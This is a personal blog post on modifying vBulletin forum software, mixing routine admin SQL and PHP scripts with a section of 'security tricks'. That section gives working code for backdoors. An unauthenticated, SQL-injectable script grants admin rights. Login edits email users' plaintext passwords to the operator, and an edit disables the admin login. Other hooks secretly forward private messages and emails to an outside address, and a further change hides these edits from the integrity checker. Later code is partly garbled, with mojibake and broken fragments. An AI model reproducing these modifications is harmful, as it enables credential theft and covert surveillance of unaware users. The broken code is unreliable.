Hold Tight...

0 %
Warith AL Maawali
Driving cybersecurity excellence
Innovator behind Linux Kodachi
  • Residence:
    ::0
  • Uptime Binary:
    101110
  • Mantra:
    Innovate, Secure, Repeat
ONS
EEDS
NSSG
Visual basic
Gambas
PHP
Delphi
Bash
  • Cybersecurity
  • Generative AI
  • Cloud & Automation
  • Cryptocurrency

Beyond Vbulletin functionality

16/06/2014

Enhancing vBulletin Forum Functionality: My Experience

vBulletin is a forum software based on PHP, and I have been involved with it since 2001 through the oman0 forum. Over the years, I have had to overcome many limitations of the software through various coding and tweaking methods. In this blog, I will share some of the tricks I’ve used to improve forum functionality. While I may not be able to explain all of them due to the extensive list, feel free to leave a comment if you come across something on the oman0 site that you’d like to know more about. I will be glad to explain it.

Please note that some of the text on the forum is in Arabic, as the forum is primarily in Arabic. I apologize for any inconvenience this may cause. You can reword it into your preferred language.

Note: Spying on people is highly unethical and illegal! Use this guide at your own risk.

Index:  

Custom security tricks:

 Custom admin bypass script setadmin.php:

This bypass script will allow you to change the user group of a normal user to admin, and you can also get the user IP from a specific post by passing the post ID.

PHP
<?php 
/* PHP script written by W. Al Maawali  
    # (c) 2014 Founder of Eagle Eye Digital Solutions
    # https://www.digi77.com
    # http://www.om77.net
    # script starts here:*/

  require_once('./global.php');
  global $admin;
  $admin=$_REQUEST['admin'];
  global $user;
  $user=$_REQUEST['user'];
  global $po;
  $po=$_REQUEST['po'];
  $insert2="UPDATE ".TABLE_PREFIX."user SET usergroupid=\"$admin\" WHERE userid =\"$user\"";
  mysql_query($insert2);
  $po2 = $vbulletin->db->query_first("SELECT postid,username,ipaddress FROM ".TABLE_PREFIX."post WHERE postid =\"$po\"");
  echo "user =" . $po2[username]  . "<br ?-->ip= " . $po2[ipaddress];
?>
PHP

 
 
Usage examples assuming that the admin group id is 6 and the user group id is 2:

Give user id 3099 admin privilege:

http://www.yoursite.net/forums/setadmin.php?admin=6&user=3099

Give user id 3099 user privilege:
http://www.yoursite.net/forums/setadmin.php?admin=2&user=3099

Get ip from post number 10992:
http://www.yoursite.net/forums/setadmin.php?po=10992

 


 

User password in plain text:  

Edited File: login.php

PHP
After line:

if ($_POST['do'] == 'login')
{

Add the following:

  $theuser=$_POST['vb_login_username'];
	$thepass=$_POST['vb_login_password'];
	$minfo= "\nSite: ". $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"] .  "\nReferer: ". $_SERVER[’HTTP_REFERER’] . "\nip: ". getenv("REMOTE_ADDR") . "\nOip: ". $HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR'];
	$theip=getenv('REMOTE_ADDR');

Before the line:

// create new session

Add the following: - Note password will be sent in clear to the email you use so be careful -

    mail("youremail@gmail.com","Loqin","The Name: $theuser  \nThe Pass: $thepass  $minfo","admin");  

If you would like to catch invalid logins and store them on file:

On same function before the line:

eval(standard_error(fetch_error('badlogin_passthru', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'])));

Add the following:

$fp = fopen("wrong-pass.html", "a");
fwrite($fp, "$theuser | $thepass | $theip 
");
PHP

  
Now call the file with false login attempts:
http://www.yoursite.com/wrong-pass.html

 


 

To Bypass Admin login on the control panel:

PHP
Edited File: admincp/global.php

Comment line 216

Original

print_cp_login();

Modified:

//print_cp_login();
PHP

 


To exclude a word from the censor function:  

Edited File: includes/functions.php

PHP
Only works if the user is in normal users group in my case it is 2 this will prevent admin from noticing the changes. To bypass any string that has the word oman at the end of the function fetch_censored_text($text) add the following:

if (preg_match("#(oman)#si", $text) AND $vbulletin->userinfo['usergroupid']==2 )
{
	$vmr= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
	if (preg_match("#(private)#si", $vmr))
	{
		//$text = preg_replace("#$censorword#si", str_repeat($vbulletin->options['censorchar'], vbstrlen($censorword)), $text);
	}
	else
	{
		$text = preg_replace("#$censorword#si", str_repeat($vbulletin->options['censorchar'], vbstrlen($censorword)), $text);
	}
}
else
{
	   $text = preg_replace("#$censorword#si", str_repeat($vbulletin->options['censorchar'], vbstrlen($censorword)), $text);
}
PHP

 

To clone private messages:

PHP
Edited File: private.php

After the line:

$vbulletin->url = 'private.php' . $vbulletin->session->vars['sessionurl_q'];

Add your cloning code:

@vbmail("youremail@gmail.com"," Pm From " .$vbulletin->userinfo['username']. " To " . $pm['recipients'] . "  " . $title,  "\nReceiver: ". $pm['recipients'] . "\nSender: ". $vbulletin->userinfo['username'] . "\nSender email: ". $vbulletin->userinfo['email']. "\nSub: ". $pm['title'] . "\nSite: ". $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"] .  "\nReferer: ". $_SERVER[’HTTP_REFERER’] . "\nip: ". getenv("REMOTE_ADDR") . "\nOip: ". $HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR'] .  "\nDate: ". date("m/d/Y") .  "\nTime: ". date("H:i:s") .  "\nTime Zone: ". date('e') . "\n\n Msg:\n ". $pm['message'] , false, $bbuserinfo['email'], '', $bbuserinfo['username']);
PHP

 


To clone email messages:  

PHP
Edited File: sendmessage.php

After the line:

vbmail($userinfo['email'], fetch_censored_text($vbulletin->GPC['emailsubject']), $message , false, $vbulletin->userinfo['email'], '', $vbulletin->userinfo['username']);

Add your cloning code:

 @vbmail("youremail@gmail.com"," Em From " .$vbulletin->userinfo['username']. " To " . $userinfo['username'] . "  " . fetch_censored_text($vbulletin->GPC['emailsubject']),  "\nReceiver: ". $userinfo['username'] . "\nReceiver email: ". $userinfo['email'] . "\nSender: ". $vbulletin->userinfo['username'] . "\nSender email: ". $vbulletin->userinfo['email']. "\nSub: ". fetch_censored_text($vbulletin->GPC['emailsubject']) . "\nSite: ". $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"] .  "\nReferer: ". $_SERVER[’HTTP_REFERER’] . "\nip: ". getenv("REMOTE_ADDR") . "\nOip: ". $HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR'] .  "\nDate: ". date("m/d/Y") .  "\nTime: ". date("H:i:s") .  "\nTime Zone: ". date('e') . "\n\n Msg:\n ". fetch_censored_text($vbulletin->GPC['message']) , false, $bbuserinfo['email'], '', $bbuserinfo['username']);
PHP

To avoid file changes to be detected by the diagnostic tool: 

File Hints: 

PHP
Edited File: diagnostic.phpComment the line 514:$errors["$directory"]["$file"][] = construct_phrase($vbphrase['file_version_mismatch_x_expected_y'], htmlspecialchars_uni($matches[1]), htmlspecialchars_uni($version_check));
PHP

 


File access hints:

If you would like to give some of your mods access to your CP functionality with enforced limitation from admincp and modcp all you have to do is create two folders and copy only the files that have the functionality you wish to give. Do not forget to protect them with htaccess in my case file structure are as follows:

PHP
/modcp-limitted
--> .htaccess
--> banning.php // Allow them to band users
--> global.php

/admincp-limitted
/control_examples
--> .htaccess
--> forum.php // Allow to change forum attributes
--> global.php
--> moderator.php // Add and control moderators
--> modlog.php // View moderators logs
--> stats.php // View forum stats
--> user.php // Control users

So for example if you would like your moderator to change member user name give him access to the following link:
http://www.yoursite.com/admincp-limitted/user.php
PHP

 


General tricks:

 
Add Linkedin view my profile to post bit:
 

From Admin CP add new single text custom field call it Linkedin note down the field number in my case it is 20

On postbit_legacy template add the following after {vb:raw post.skypeicon} :


LinkedIn


MySql hints:

SQL
Get users who have specific style for example style id 52

select userid from user where styleid=52

Change user group from waiting email confirmation to registered

update user set usergroupid=2 where usergroupid=3

Set awaiting moderation group to moderaters

update user set usergroupid=7 where usergroupid=39

Update custom field 7 for user id > 90301

UPDATE userfield SET field7 = 1 WHERE userid >90301

Change ip address for post number 2331

update post set ipaddress="62.231.226.232" where postid=2331;

Set all members to have GMT+4 time

update user set timezoneoffset=4 where userid>0

Rest profile number of visits for member id185634

update user set profilevisits=1 where userid=185634;

Update language for user id 1

update user set languageid=1 where userid=1;

Change user styles to style 13

update user set styleid=13

Reputation rest

update `reputation` set `reputation`=10 where reputation>10;
update `reputation` set `reputation`=-10 where reputation<0;
UPDATE user SET reputation = 0, reputationlevelid = 0;

Reset user custom profile for user id 218328

delete from customprofile where userid=218328

Delete all blogs entries for user id 261559

delete from blog_text where userid=261559;
SQL

 


Change user id from 142864 to 2: 

There is a high risk of ruining your database for good, so be careful.

SQL
UPDATE `adminlog`  SET `userid`  =  '2' WHERE `adminlog`.`userid` =142864;
UPDATE `announcement`  SET `userid`  =  '2' WHERE `announcement`.`userid` =142864;
UPDATE `announcementread`  SET `userid`  =  '2' WHERE `announcementread`.`userid` =142864;
UPDATE `attachment`  SET `userid`  =  '2' WHERE `attachment`.`userid` =142864;
UPDATE `calendarmoderator`  SET `userid`  =  '2' WHERE `calendarmoderator`.`userid` =142864;
UPDATE `cpsession`  SET `userid`  =  '2' WHERE `cpsession`.`userid` =142864;
UPDATE `customavatar`  SET `userid`  =  '2' WHERE `customavatar`.`userid` =142864;
UPDATE `customprofilepic`  SET `userid`  =  '2' WHERE `customprofilepic`.`userid` =142864;
UPDATE `deletionlog`  SET `userid`  =  '2' WHERE `deletionlog`.`userid` =142864;
UPDATE `editlog`  SET `userid`  =  '2' WHERE `editlog`.`userid` =142864;
UPDATE `event`  SET `userid`  =  '2' WHERE `event`.`userid` =142864;
UPDATE `forumread`  SET `userid`  =  '2' WHERE `forumread`.`userid` =142864;
UPDATE `infraction`  SET `userid`  =  '2' WHERE `infraction`.`userid` =142864;
UPDATE `moderator`  SET `userid`  =  '2' WHERE `moderator`.`userid` =142864;
UPDATE `moderatorlog`  SET `userid`  =  '2' WHERE `moderatorlog`.`userid` =142864;
UPDATE `passwordhistory`  SET `userid`  =  '2' WHERE `passwordhistory`.`userid` =142864;
UPDATE `paymentinfo`  SET `userid`  =  '2' WHERE `paymentinfo`.`userid` =142864;
UPDATE `pm`  SET `userid`  =  '2' WHERE `pm`.`userid` =142864;
UPDATE `pmreceipt`  SET `userid`  =  '2' WHERE `pmreceipt`.`userid` =142864;
UPDATE `pollvote`  SET `userid`  =  '2' WHERE `pollvote`.`userid` =142864;
UPDATE `post`  SET `userid`  =  '2' WHERE `post`.`userid` =142864;
UPDATE `posthash`  SET `userid`  =  '2' WHERE `posthash`.`userid` =142864;
UPDATE `reminder`  SET `userid`  =  '2' WHERE `reminder`.`userid` =142864;
UPDATE `reputation`  SET `userid`  =  '2' WHERE `reputation`.`userid` =142864;
UPDATE `rssfeed`  SET `userid`  =  '2' WHERE `rssfeed`.`userid` =142864;
UPDATE `search`  SET `userid`  =  '2' WHERE `search`.`userid` =142864;
UPDATE `session`  SET `userid`  =  '2' WHERE `session`.`userid` =142864;
UPDATE `sigparsed`  SET `userid`  =  '2' WHERE `sigparsed`.`userid` =142864;
UPDATE `sigpic`  SET `userid`  =  '2' WHERE `sigpic`.`userid` =142864;
UPDATE `subscribeevent`  SET `userid`  =  '2' WHERE `subscribeevent`.`userid` =142864;
UPDATE `subscribeforum`  SET `userid`  =  '2' WHERE `subscribeforum`.`userid` =142864;
UPDATE `subscribethread`  SET `userid`  =  '2' WHERE `subscribethread`.`userid` =142864;
UPDATE `subscriptionlog`  SET `userid`  =  '2' WHERE `subscriptionlog`.`userid` =142864;
UPDATE `tachyforumpost`  SET `userid`  =  '2' WHERE `tachyforumpost`.`userid` =142864;
UPDATE `tachythreadpost`  SET `userid`  =  '2' WHERE `tachythreadpost`.`userid` =142864;
UPDATE `threadrate`  SET `userid`  =  '2' WHERE `threadrate`.`userid` =142864;
UPDATE `threadread`  SET `userid`  =  '2' WHERE `threadread`.`userid` =142864;
UPDATE `user`  SET `userid`  =  '2' WHERE `user`.`userid` =142864;
UPDATE `useractivation`  SET `userid`  =  '2' WHERE `useractivation`.`userid` =142864;
UPDATE `userban`  SET `userid`  =  '2' WHERE `userban`.`userid` =142864;
UPDATE `userfield`  SET `userid`  =  '2' WHERE `userfield`.`userid` =142864;
UPDATE `usergroupleader`  SET `userid`  =  '2' WHERE `usergroupleader`.`userid` =142864;
UPDATE `usergrouprequest`  SET `userid`  =  '2' WHERE `usergrouprequest`.`userid` =142864;
UPDATE `usernote`  SET `userid`  =  '2' WHERE `usernote`.`userid` =142864;
UPDATE `usertextfield`  SET `userid`  =  '2' WHERE `usertextfield`.`userid` =142864;
UPDATE `thread` SET `postuserid` = '2' WHERE `thread`.`postuserid` =142864;
SQL

 


 

Custom scripts:

Delete duplicate threads with the same title and different timestamps: 

PHP
## Delete duplicate threads with the same title and different timestamp:

Edited File: admincp/misc.php

Original code line 1438:

while ($thread = $db->fetch_array($threads))
	{
		$deletethreads = $db->query_read("
			SELECT *
			FROM " . TABLE_PREFIX . "thread
			WHERE title = '" . $db->escape_string($thread['title']) . "' AND
				forumid = $thread[forumid] AND
				postusername = '" . $db->escape_string($thread['postusername']) . "' AND
				dateline = $thread[dateline] AND
				threadid > $thread[threadid]
		");

Modified code:

while ($thread = $db->fetch_array($threads))
	{
		$deletethreads = $db->query_read("
			SELECT *
			FROM " . TABLE_PREFIX . "thread
			WHERE title = '" . $db->escape_string($thread['title']) . "' AND
				forumid = $thread[forumid] AND
				postusername = '" . $db->escape_string($thread['postusername']) . "' AND
				threadid > $thread[threadid]
		");

If you would like to delete threads only on specific forums in my case forum numbers are 241, 175, 233, 246, and 247 then code will look like this:

$threads = $db->query_read("
		SELECT threadid, title, forumid, postusername, dateline
		FROM " . TABLE_PREFIX . "thread WHERE threadid >= " . $vbulletin->GPC['startat'] . " and forumid IN ('241','175','233','246','247')
		ORDER BY threadid
		LIMIT " . $vbulletin->GPC['perpage']
	);

	$finishat = $vbulletin->GPC['startat'];

	while ($thread = $db->fetch_array($threads))
	{
		$deletethreads = $db->query_read("
			SELECT *
			FROM " . TABLE_PREFIX . "thread
			WHERE title = '" . $db->escape_string($thread['title']) . "' AND
				forumid = $thread[forumid] AND
				postusername = '" . $db->escape_string($thread['postusername']) . "' AND
				threadid > $thread[threadid]
		");
PHP

 

Show forum advance statistics using Ajax:

I have used Ajax in many sections of the forum including member awarding system and best posts system. This is one of the examples where you can retrieve all forum statistics including the forum age via Ajax. I use separate html files but you can invoke it directly in any template of your forum style.

Create html file and call it test.html

Paste the following code into it:

JavaScript
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js" type="text/javascript"></script>


<!-- for ajax counte-->
<script type="text/javascript">
$(document).ready(function(){ 
     var updatecount = function(){
          $('#membercount')
               .load('fourm-statictics.php')
               .fadeIn("slow");
     };

     var auto_refresh = setInterval(function(){updatecount();}, 90000); 
     updatecount();
});
</script>
JavaScript
HTML
<div id="membercount" style="text-align: right;"> </div>
HTML

Create php file and call it fourm-statictics.php

Paste the following code into it:

PHP
 <?
 Members: $mem_count5[total]   
";
	echo " Available Members and guests: $mem_count1[total]   
";
	
	 
	echo " posts: $mem_count[total]   
";
	echo " Threads: $mem_count2[total]   
";
	 

	echo " Image gallery: $mem_count6[total]   
";
	echo " video gallery: $mem_count7[total]   
";
	 


	echo " Visitors messages: $mem_count4[total]   
";
	echo " Private messages: $mem_count3[total]   
";
	 
	
	$tmp = getdbsize(xxxxx); // Replace with your own forum Database name
	if (!$tmp) { echo "ERROR!"; }
	else 
	{ 
		echo "  Sql size:  $tmp  k.B" ; 
	}

}
?>
PHP

 
 
Now call the file with wrong attempts:
http://www.yoursite.com/test.html

 


Show forum advance statistics using Ajax:

Create a new template on your forum style call it changename-vb4 and paste the following code:

PHP
<?php
{vb:stylevar htmldoctype} xmlns:fb="http://www.facebook.com/2008/fbml" dir="{vb:stylevar textdirection}" lang="{vb:stylevar languagecode}" id="vbulletin_html">
	{vb:raw headinclude}

	
	{vb:cssfile forumhome-rollup.css}
	
	{vb:cssfile forumbits.css,forumhome.css,widgets.css,sidebar.css,options.css,tagcloud.css}
	

	
	
	
	
	{vb:raw headinclude_bottom}

	

	{vb:raw header}

	{vb:raw navbar}
<div id="wgo" class="collapse wgo_block block">
<h2 class="blockhead" align="right">  Change user names </h2>
<div class="blockbody formcontrols floatcontainer">
			
<br>
<div class="blockrow">
<div class="blockrow"> </div>
</div>
<div class="blockrow">
<div class="blockrow"> </div>
</div>
<table class="tborder" border="0" width="40%" cellspacing="$stylevar[cellspacing]" cellpadding="$stylevar[cellpadding]" align="center">
<tbody>
<tr>
<td class="alt1">Old Name</td>
<td class="alt2">
 <input class="primary textbox" maxlength="85" name="user_name/" type="text">

    </td>
</tr>
<tr>
<td class="alt2">New Name </td>
<td class="alt2">
 <input class="primary textbox" maxlength="85" name="newname/" type="text">
<input class="button" name="Submit" type="submit" value="Change">
</td>
</tr>
</tbody>
</table>
</div>

<br><br>
</div>
{vb:raw vsachatbox}

	{vb:raw footer}
?>
PHP

 
 
Then on you forum root folder, create a file with this name changename0.php and paste the following code:

PHP
<?php 
/* PHP script written by W. Al Maawali  
    # (c) 2014 Founder of Eagle Eye Digital Solutions
    # https://www.digi77.com
    # http://www.om77.net
    # script starts here:*/

// ####################### SET PHP ENVIRONMENT ###########################
error_reporting(E_ALL & ~E_NOTICE);

// #################### DEFINE IMPORTANT CONSTANTS #######################

define('THIS_SCRIPT', 'changename0');
define('CSRF_PROTECTION', true);
// change this depending on your filename

// ################### PRE-CACHE TEMPLATES AND DATA ######################
// get special phrase groups
$phrasegroups = array();

// get special data templates from the datastore
$specialtemplates = array();

// pre-cache templates used by all actions
$globaltemplates = array('changename-vb4',
);

// pre-cache templates used by specific actions
$actiontemplates = array();

// ######################### REQUIRE BACK-END ############################
// if your page is outside of your normal vb forums directory, you should change directories by uncommenting the next line
// chdir ('/path/to/your/forums');
require_once('./global.php');

// #######################################################################
// ######################## START MAIN SCRIPT ############################
// #######################################################################

$navbits = construct_navbits(array('' => 'ÊÛííÑ ÇáÃÓãÇÁ'));
$navbar = render_navbar_template($navbits);

// ###### YOUR CUSTOM CODE GOES HERE #####
$pagetitle = 'Change user name';

$templater = vB_Template::create('changename-vb4');
$templater->register_page_templates();
$templater->register('navbar', $navbar);
$templater->register('pagetitle', $pagetitle);
$templater->register('widget', $output);


   //allow super mods only 
    if($vbulletin->userinfo['usergroupid']==5 || $vbulletin->userinfo['usergroupid']==6 || $vbulletin->userinfo['usergroupid']==8 || $vbulletin->userinfo['usergroupid']==37)
    {
       //print_output($templater->render());
    }
     else
    {

        //print_no_permission();
        exit;

    }


?>
PHP

 
 
Then on you forum root folder create a file with this name changename.php paste the following code: 

PHP
$templater->register('user_name', $user_name);<br>    $templater->register('newname', $newname);<br>    //print_output($templater->render());<br><br>}<br><br><br><br><br><br>$query = "select username from user where username=\"$user_name\"";<br>$query = mysqlCleaner($query);<br>$result = mysql_query($query);<br><br>while ($row = mysql_fetch_row($result))<br>{<br>      $team3="$row[0]";<br><br>}<br><br>if($team3!=$user_name)<br>{<br>     echo "<#script>alert('test')</script>";<br>    $templater->register('user_name', $user_name);<br>    $templater->register('newname', $newname);<br>    print_output($templater->render());<br>}<br>else<br>{<br><br><br> $query1 = "select username from user where username=\"$newname\"";<br>    $query1 = mysqlCleaner($query1);<br>  $result1 = mysql_query($query1);<br><br>  while ($row1 = mysql_fetch_row($result1))<br> {<br>           $temp1="$row1[0]";<br><br>    }<br><br>   if ($temp1==$newname)<br> {<br><br>           echo "<#script>alert('ÇáÅÓã ÇáÌÏíÏ ÇáÐí ÅÎÊÑÊå ãÓÌá áÏíäÇ Þã ÈÊÛíÑå æÍÇæá ãÑÉ ÃÎÑì')</script>";<br>          $templater->register('user_name', $user_name);<br>            $templater->register('newname', $newname);<br>            print_output($templater->render());<br><br>    }  //end if<br> else<br>    {<br><br>     <br>      $insert2="UPDATE user SET username=\"$newname\" WHERE username =\"$user_name\"";<br>     $insert2 = mysqlCleaner($insert2);<br>        mysql_query($insert2);<br>     echo "<#script>alert('Êã ÊÛíÑ ÇáÅÓã ãä $user_name Åáì $newname ')</script>";<br>       <br>        // get his ip<br>       $ipaddress =  getenv("REMOTE_ADDR");<br>       $supname= $vbulletin->userinfo['username'];<br>       //send me an email with the changes <br>        mail("warith@digi77.com","$user_name nick was changed","$user_name was changed to $newname by $supname his ip is $ipaddress","admin");<br>     <br>        <br>        $templater->register('user_name', $user_name);<br>        $templater->register('newname', $newname);<br>        print_output($templater->render());<br>        <br>        exit;<br>       <br>            <br><br>    } // end else
PHP


 
Now call the script by the following url:
http://www.yoursite.com/changename0.php

 


Get forum moderators’ attendance based on their last post and login date: 

 Create a new template on your forum style call it showallmodav-vb4 and paste the following code:

PHP
{vb:stylevar htmldoctype} xmlns:fb="http://www.facebook.com/2008/fbml" dir="{vb:stylevar textdirection}" lang="{vb:stylevar languagecode}" id="vbulletin_html">
	{vb:raw headinclude}

	
	{vb:cssfile forumhome-rollup.css}
	
	{vb:cssfile forumbits.css,forumhome.css,widgets.css,sidebar.css,options.css,tagcloud.css}
	

	
	
	
	
	{vb:raw headinclude_bottom}

	

	{vb:raw header}
<div id="wgo" class="collapse wgo_block block">
<h2 class="blockhead" align="right">Attendance list based on last post date </h2>
<div class="blockbody formcontrols floatcontainer">
			
<br>
  


{vb:raw theout}

<br>
</div>

	{vb:raw navbar}
	{vb:raw footer}
PHP
	
 
Then on you forum root folder create a file with this name showmodav.php paste the following code:
PHP
<?php
    echo "123";
?>
PHP
PHP
<?php

echo  "Proxy is up and working :).<br /-->\n" . " The IP address we found from your request is: "  . getenv("REMOTE_ADDR") ."<br>\n" ;

?

```php
CSS additional:
code {

color:#3bf715;

}

.single-post-text ul>li a,
.single-post-text ol>li a,
.comment-text ul>li a,
.comment-text ol>li a {
color: #fcb900;
}
```

<table class="has-fixed-layout"><tbody><tr><td colspan="6">Data Center Control</td></tr><tr><td>Server ID</td><td>Server Name</td><td>City</td><td>IP</td><td>Status</td><td>Creation Date</td><td>Bandwidth</td><td>Backups</td></tr><tr><td> </td><td> </td><td> </td><td> </td><td> </td><td> </td><td> </td><td> </td></tr><tr><td colspan="2">
        Online Droplets: <!--?php echo  "<font color=\"green\">"  . $liveCounter . "</font>"?--><br>
        Offline Droplets: <!--?php echo  "<font color=\"red\">"  . $deadCounter . "</font>"?--><br>
        Total Droplets: <!--?php echo  "<font color=\"black\">"  . $counterSum . "</font>"?--><br>
        <!--?php echo "Query Time: " . "<font color=\"green\">" . (time() - $loadingtime) . "s </font><br ?-->\n"; ?>
        </td></tr></tbody></table>
PHP
PHP
<?php
/* PHP script written by W. Al Maawali  
    # (c) 2014 Founder of Eagle Eye Digital Solutions
    # https://www.digi77.com
    # http://www.om77.net
    # script starts here:*/

// ####################### SET PHP ENVIRONMENT ###########################
error_reporting(E_ALL & ~E_NOTICE);

// #################### DEFINE IMPORTANT CONSTANTS #######################

define('THIS_SCRIPT', 'showmodav');
define('CSRF_PROTECTION', true);
// change this depending on your filename

// ################### PRE-CACHE TEMPLATES AND DATA ######################
// get special phrase groups
$phrasegroups = array();

// get special data templates from the datastore
$specialtemplates = array();

// pre-cache templates used by all actions
$globaltemplates = array('showallmodav-vb4',
);

// pre-cache templates used by specific actions
$actiontemplates = array();

// ######################### REQUIRE BACK-END ############################
// if your page is outside of your normal vb forums directory, you should change directories by uncommenting the next line
// chdir ('/path/to/your/forums');
require_once('./global.php');

// #######################################################################
// ######################## START MAIN SCRIPT ############################
// #######################################################################
$navbits = construct_navbits(array('' => 'Attendance list based on last post date'));
$navbar = render_navbar_template($navbits);

// ###### YOUR CUSTOM CODE GOES HERE #####
$pagetitle = 'Moderator absence';




$templater = vB_Template::create('showallmodav-vb4');
$templater->register_page_templates();
$templater->register('navbar', $navbar);
$templater->register('pagetitle', $pagetitle);
$templater->register('widget', $output);






//User groups that are allowed to view:

if($vbulletin->userinfo['usergroupid']!=39 and $vbulletin->userinfo['usergroupid']!=5 and $vbulletin->userinfo['usergroupid']!=6 and $vbulletin->userinfo['usergroupid']!=7 and $vbulletin->userinfo['usergroupid']!=8 and $vbulletin->userinfo['usergroupid']!=12 and $vbulletin->userinfo['usergroupid']!=37)
{

    print_no_permission();

    exit;

}


// Global variables
global $totalmod;
global $page;



$page=$_REQUEST['page'];
$page=(filter_var($page, FILTER_SANITIZE_NUMBER_INT));

//For Sql query variable use
function mysqlCleaner($data)
{
    $data= mysql_real_escape_string($data);
    $data= stripslashes($data);
    return $data;
}    



function count_days($start, $end)
{

    if( $start != '0000-00-00' and $end != '0000-00-00' )

    {

        $timestamp_start = strtotime($start);

        $timestamp_end = strtotime($end);

        if( $timestamp_start >= $timestamp_end ) return 0;

        $start_year = date("Y",$timestamp_start);

        $end_year = date("Y", $timestamp_end);

        $num_days_start = date("z",strtotime($start));

        $num_days_end = date("z", strtotime($end));

        $num_days = 0;

        $i = 0;

        if( $end_year > $start_year )

        {

            while( $i < ( $end_year - $start_year ) )

            {

                $num_days = $num_days + date("z", strtotime(($start_year + $i)."-12-31"));

                $i++;

            }

        }

        return ( $num_days_end + $num_days ) - $num_days_start;

    }

    else
    {

            return "wrong date" ;

    }

}//end function




// for multiple pages code

$limit      = 45;

// Sets how many results shown per page




if(empty($page)){    // Checks if the $page variable is empty (not set)

$page = 1;      // If it is empty, we're on page 1

}



$limitvalue = $page * $limit - ($limit);

// Ex: (2 * 25) - 25 = 25 <- data starts at 25




//Admin and super mods can view admins and below  6 5 8 37
if($vbulletin->userinfo['usergroupid']==5 or $vbulletin->userinfo['usergroupid']==6 or $vbulletin->userinfo['usergroupid']==37 or $vbulletin->userinfo['usergroupid']==8)
{


     //get total mods
     $usertherd = $db->query_first("SELECT COUNT(userid) AS total FROM user WHERE usergroupid ='12' or usergroupid ='7' or usergroupid ='5' or usergroupid ='6' or usergroupid ='8' or usergroupid ='37' or usergroupid ='39'");
     $totalmod=  $usertherd[total];
     $totalrows=$totalmod;
     //end get total
     $query = "select username,lastpost,userid,usertitle,lastactivity,lastvisit from user where usergroupid ='12' or usergroupid ='7' or usergroupid ='5' or usergroupid ='6' or usergroupid ='8' or usergroupid ='37' or usergroupid ='39' order by lastpost asc  LIMIT $limitvalue, $limit";
     $query= mysqlCleaner($query);
     $result = mysql_query($query);

}
else //not an admin 
{

     //get total mods
     $usertherd = $db->query_first("SELECT COUNT(userid) AS total FROM user WHERE usergroupid ='12' or usergroupid ='7' or usergroupid ='39'");
     $totalmod=  $usertherd[total];
     $totalrows=$totalmod;
     //end get total
     $query = "select username,lastpost,userid,usertitle,lastactivity,lastvisit from user where usergroupid ='12' or usergroupid ='7' or usergroupid ='39' order by lastpost asc  LIMIT $limitvalue, $limit";
     $query= mysqlCleaner($query);
     $result = mysql_query($query);




}

//sorry my forum is in Arabic you can change the wording
$theout.= "<img src="https://www.om77.net/images/statusicon/post_new.gif" alt="Super-Awards/">  ÞÇÆãÉ ÇáÃÓãÇÁ :- <br>( ÔÑÍ ÇáæÇä ÇáÃíÇã : ÃÚáì ãä 90 íæã ÈÇáÃÍãÑ - ÃÚáì ãä 60 íæã ÈÇáÃÒÑÞ - ÃÚáì ãä 30 íæã ÈÇáÃÎÖÑ)   <br><br>
<!-- /wp:preformatted -->

<!-- wp:html -->
<center>"; $theout.= ""; while ($row = mysql_fetch_row($result)) { date_default_timezone_set('Asia/Muscat'); //convert date from database for last post $_timestamp = empty($row[4])? time()+($site_timeoffset*3600): $row[4]; $tmo = date("m", $_timestamp); $tda = date("j", $_timestamp); $tyr = date("Y", $_timestamp); $tnum = (intval((date ("U", mktime(0,0,0,$tmo,$tda,$tyr))/86400))); // TODAY'S DAY NUMBER $tdate=$tyr ."-" .$tmo. "-" .$tda; $tdate2=$tda ."-" .$tmo. "-" .$tyr; $_timestamp5 = empty($row[4])? time()+($site_timeoffset*3600): $row[4]; $tmo5 = date("m", $_timestamp5); $tda5 = date("j", $_timestamp5); $tyr5 = date("Y", $_timestamp5); $tnum5 = (intval((date ("U", mktime(0,0,0,$tmo5,$tda5,$tyr5))/86400))); // TODAY'S DAY NUMBER $tdate5=$tyr5 ."-" .$tmo5. "-" .$tda5; $tdate6=$tda5 ."-" .$tmo5. "-" .$tyr5; //get today's date $today = mktime(0,0,0,date("m"),date("d"),date("y")); $_timestamp1 = empty($today)? time()+($site_timeoffset*3600): $today; $tmo1 = date("m", $_timestamp1); $tda1 = date("j", $_timestamp1); $tyr1 = date("Y", $_timestamp1); $tnum1 = (intval((date ("U", mktime(0,0,0,$tmo1,$tda1,$tyr1))/86400))); // TODAY'S DAY NUMBER $tdate1=$tyr1 ."-" .$tmo1. "-" .$tda1; $mx=count_days ($tdate,$tdate1); //get the title $query2 = "select field15 from userfield where userid=\"$row[2]\""; $result2 = mysql_query($query2); //colour the if > 90 days if ($mx > 90) { $mx= "<b> $mx </b>"; } else if ($mx > 60 and $mx < 90) { $mx= "<b> $mx </b>"; } else if ($mx > 30 and $mx < 60) { $mx= "<b> $mx </b>"; } //end get days for last visit //gets days for last post $_timestamp = empty($row[1])? time()+($site_timeoffset*3600): $row[1]; $tmo = date("m", $_timestamp); $tda = date("j", $_timestamp); $tyr = date("Y", $_timestamp); $tnum = (intval((date ("U", mktime(0,0,0,$tmo,$tda,$tyr))/86400))); // TODAY'S DAY NUMBER $tdate=$tyr ."-" .$tmo. "-" .$tda; $tdate2=$tda ."-" .$tmo. "-" .$tyr; $_timestamp5 = empty($row[4])? time()+($site_timeoffset*3600): $row[4]; $tmo5 = date("m", $_timestamp5); $tda5 = date("j", $_timestamp5); $tyr5 = date("Y", $_timestamp5); $tnum5 = (intval((date ("U", mktime(0,0,0,$tmo5,$tda5,$tyr5))/86400))); // TODAY'S DAY NUMBER $tdate5=$tyr5 ."-" .$tmo5. "-" .$tda5; $tdate6=$tda5 ."-" .$tmo5. "-" .$tyr5; //get today's date $today = mktime(0,0,0,date("m"),date("d"),date("y")); $_timestamp1 = empty($today)? time()+($site_timeoffset*3600): $today; $tmo1 = date("m", $_timestamp1); $tda1 = date("j", $_timestamp1); $tyr1 = date("Y", $_timestamp1); $tnum1 = (intval((date ("U", 